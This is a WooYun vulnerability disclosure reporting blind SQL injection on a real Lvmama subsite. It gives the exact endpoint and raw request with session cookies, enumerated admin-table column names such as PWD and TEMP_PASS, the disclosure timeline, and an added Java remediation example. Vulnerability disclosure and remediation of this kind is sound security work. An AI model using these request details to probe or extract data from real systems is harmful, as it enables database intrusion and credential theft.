Vulnerability summary

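Bug ID: wooyun-2015-0142081

Title: SQL injection in a subsite of Lvmama (驴妈妈旅游网) allows reading database tables (DBA privileges / time-based blind injection)

Vendor: Lvmama (驴妈妈旅游网)

Author: Xmyth_Xi2oMin9

Submitted: 2015-10-03 12:35

Fixed: 2015-11-22 11:02

Published: 2015-11-22 11:02

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: Confirmed by the vendor

Source: http://www.wooyun.org; for questions or help, contact [email protected]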

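Vulnerability details

Disclosure status:

2015-10-03: Details reported to the vendor; awaiting vendor handling
2015-10-08: Vendor confirmed; details disclosed to the vendor only
2015-10-18: Details disclosed to core white hats and experts in related fields
2015-10-28: Details disclosed to regular white hats
2015-11-07: Details disclosed to trainee white hats
2015-11-22: Details disclosed to the public

Brief description: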

RT

Detailed description:

Test:

POST /b2b/prod_list_ajax.jsp HTTP/1.1
Host: fenxiao.lvmama.com
Proxy-Connection: keep-alive
Content-Length: 178
Accept: */*
Origin: http://fenxiao.lvmama.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://fenxiao.lvmama.com/b2b/prod_list.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: uid=wKgKb1X79EWfLzjUDjwAAg==; CoreID6=81323363387714425754327&ci=90409730; _lvTrack_UUID=1474E648-6D2E-44E3-AF56-2B3DE7634870; lvsessionid=6eda4b74-db89-4ed6-b3f0-
a628d51b5430_18400608; cityName=%u5317%u4EAC; stationCode=BJ; stationId=13; stationPinyin=beijing; JSESSIONID=fK6cK_BxQZF4; startadd=10011;
a1a50777ae54df93c3348cef08dce3c3=1Zj9Xd0N2Xh5Wb9Ua60ma5Iaa5IaY5GiZ6ASb5zmY5w+mJiR2Xpxmb9s2chFzc0EmJfd3YzVFdp9DZy0TNwAjMmc;
87975ce5500b2471292c9d022b9ef2db=3YzVFdp9DZy0DO4UTMmgHb0l2XklSPjZXd0N3X5RGc9UiMnZ2X1N3cfRWa9QjMwUDM3InJzVXZfJmbtFTZm0XafN3ZvJXd9ACMpZ1ck9XawNTPmEGZfJGbulzaz1WYzFTMmQXdlNlcp9DZ
x0jM0MTNmY; sourceid=19; 67df798e21e2dfa38ce087214349f9b3=mcs9VZp9DZz0nJzVXZfJWa9QTMzIDN2UmJiR2Xpxmb9s2chFzc0EmJfd3YzVFdu9WYl1ePKWOolWOtlWOtYa
+n6SuuueeoQeuhFWOrPWCujZXd0N2XklTP4ITNxgCOnZ2X1N3cfRWa9QjMwUDM3IgJ==; _lvTrack_sessionID=1BC64181-12AA-4FE6-8B8F-6AC606BDCB6D; orderFromChannel=bing; __utmt=1;
__xsptplus443=443.2.1442580067.1442580462.8%234%7C%7C%7C%7C%7C%23%23KC--73_S5PSqQXPHmXJaDKIHJH8ApGTC%23; Hm_lvt_cb09ebb4692b521604e77f4bf0a61013=1442576325;
Hm_lpvt_cb09ebb4692b521604e77f4bf0a61013=1442580462; __utma=30114658.555334212.1442575433.1442575433.1442579732.2; __utmb=30114658.46.10.1442579732; __utmc=30114658;
__utmz=30114658.1442579732.2.2.utmcsr=pufa.lvmama.com|utmccn=(referral)|utmcmd=referral|utmcct=/; bfd_s=30114658.98025856.1442579732433;
tmc=38.30114658.23301528.1442579732436.1442580403663.1442580462914; tma=30114658.30289188.1442575434188.1442575434188.1442575434188.1; tmd=53.30114658.30289188.1442575434188.;
utag_main=v_id:014fe07d6a09001ee167fbff27b12206d001806500bd0$_sn:1$_ss:0$_pn:2%3Bexp-session$_st:1442582263890$ses_id:1442580359689%3Bexp-session;
bkng=11UmFuZG9tSVYkc2RlIyh9YWJdm48m5cJDn9J9XTZq5ICUVFiY5xaaSGnswzLnZ5fMPdL9LvzsOTorEZlMtMZiixNZ%2FNAdp4hsOM61BZPExUO3lqlR89zEcWLn%2FRQf9TdmwRUiOVC
%2BY7kW1oQwcXil0%2B6ndkhaE9Vcj69K71aZWMxeLoPWcJ4ylPaJgRxh2xifKqrnirxUPjo%3D; bfd_g=9de2782bcb754fd7000031ec004eb3b555fbf449; 90409730_clogin=v=1&l=1442579732&e=1442582334485;
dc4e01dbca1cd374ffb9068b31380fc2=Hb0l2XklSPjZXd0N2XklTP4ITNxgCOpZ1c39GaslTZw0mJ1N3cfRHdwlTZy0mJfd3YzVFdp9DZy0TNwAjMmcXdlNlcu9WYl1ePKWOolWOtlWOtYa
+n6SuuueeoQeuhFWOrPWCupZ1cn9mc19Dcw0mJzl2XpR3c9ASMkZlYs9War5XPhNXYxMCNyZ2blx2XklTPmMXdlNlcp9DZx0jM0MTNmY

start=0&limit=40&key=3213123&tree_id=0&cust_id=&area=&ad=&fw=&pay=&confirm=&gt=&tag=&line=&group=&tname=&grade=&internet=&brekker=&action=list&testid=1003&sort=view_name&dir=DESC


[Screenshots: 5.jpg, 56.jpg]

Proof of vulnerability:

Privileges:

[Screenshot: 3333.jpg]


ADMIN_LOGIN:

[08:29:32] NAME
[08:29:32] EXTENSION_ID
[08:29:32] ACCOUNTS
[08:29:32] PROVINCIAL
[08:29:32] CHROMOSOME_ID
[08:29:32] OPERATIONID
[08:29:32] TRANSACTION_ID
[08:29:32] MSG_ID
[08:29:37] ACCOUNT_ID
[08:29:41] SCHLUSSELWORT
[08:29:49] PWD
[08:30:05] AIM
[08:30:20] TEMP_PASS


Remediation:

Test it yourselves :-)

Copyright notice: when reposting, please credit the source: Xmyth_Xi2oMin9@WooYun
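
Added example, not part of the original report and not the vendor's code: one way to handle the parameters of the request above on the server side so that none of them can alter the SQL text. The report does not say which parameter is injectable; the table name `prod_view`, the allow-listed column, the range limits and the paging syntax are assumptions.

```java
import java.util.Map;
import java.util.Set;

// Added example: validation for the prod_list_ajax.jsp parameters; names and limits are assumptions.
public class ProdListQuery {
    // Assumed sortable columns; only view_name appears in the report.
    private static final Set<String> SORT_COLUMNS = Set.of("view_name");
    private static final Set<String> DIRECTIONS = Set.of("ASC", "DESC");
    /** SQL text with placeholders plus the values to bind. */
    public record Built(String sql, Object[] binds) {}

    public static Built build(Map<String, String> p) {
        // Identifiers cannot be bound, so sort/dir must match an allow-list exactly.
        String sort = p.getOrDefault("sort", "view_name");
        String dir = p.getOrDefault("dir", "ASC");
        if (!SORT_COLUMNS.contains(sort) || !DIRECTIONS.contains(dir)) {
            throw new IllegalArgumentException("unsupported sort or dir");
        }
        // Numeric paging values are parsed and range-checked, never concatenated.
        int start = parseInt(p.getOrDefault("start", "0"), 0, 1_000_000);
        int limit = parseInt(p.getOrDefault("limit", "40"), 1, 100);
        // Free-text values such as key are passed only as bind variables.
        String key = p.getOrDefault("key", "");
        String sql = "SELECT * FROM prod_view WHERE view_name LIKE ? ORDER BY "
                + sort + " " + dir + " OFFSET ? ROWS FETCH NEXT ? ROWS ONLY";
        return new Built(sql, new Object[] {"%" + key + "%", start, limit});
    }

    private static int parseInt(String s, int min, int max) {
        try {
            int v = Integer.parseInt(s);
            if (v < min || v > max) throw new NumberFormatException();
            return v;
        } catch (NumberFormatException e) {
            throw new IllegalArgumentException("value out of range");
        }
    }

    public static void main(String[] args) {
        Built ok = build(Map.of("start", "0", "limit", "40", "key", "3213123",
                "sort", "view_name", "dir", "DESC"));
        System.out.println(ok.sql());
        try {
            build(Map.of("sort", "view_name", "dir", "DESC extra")); // constructed bad input
        } catch (IllegalArgumentException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

The returned SQL text is meant to be passed to a `PreparedStatement`, with the `binds` values set in order.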


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed: 2015-10-08 11:01

Vendor reply:

thx

Latest status:

None